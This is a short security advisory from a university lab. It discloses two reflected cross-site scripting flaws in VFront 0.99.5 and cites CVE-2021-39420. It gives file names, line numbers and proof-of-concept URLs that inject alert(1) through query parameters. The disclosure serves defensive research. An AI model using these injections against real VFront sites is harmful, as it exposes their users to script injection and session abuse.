Your browser is unsupported

We recommend using the latest version of IE11, Edge, Chrome, Firefox or Safari.

Search

Systems and Internet Security Lab

UIC Computer Science

Cross site scripting in VFront v0.99.5

Cross site scripting in VFront v0.99.5 Heading link

Multiple cross site scripting vulnerabilities are present in VFront 0.99.5. The following is detailed information about these vulnerabilities:

file: search_all.php
line: 104
exploit: http://localhost/vfront-0.99.51/search_all.php?s=%22alert(1);

file: add.attach.php
line: 351
exploit: http://localhost/vfront-0.99.51/add.attach.php?feed=ko&id=1&t=tabella&msg=alert(1);
Notes: the parameter 't' must be the name of an existing table inside the database managed by vfront.

Above vulnerabilities are published at CVE-2021-39420

This vulnerability was detected as part of the DARPA CHESS program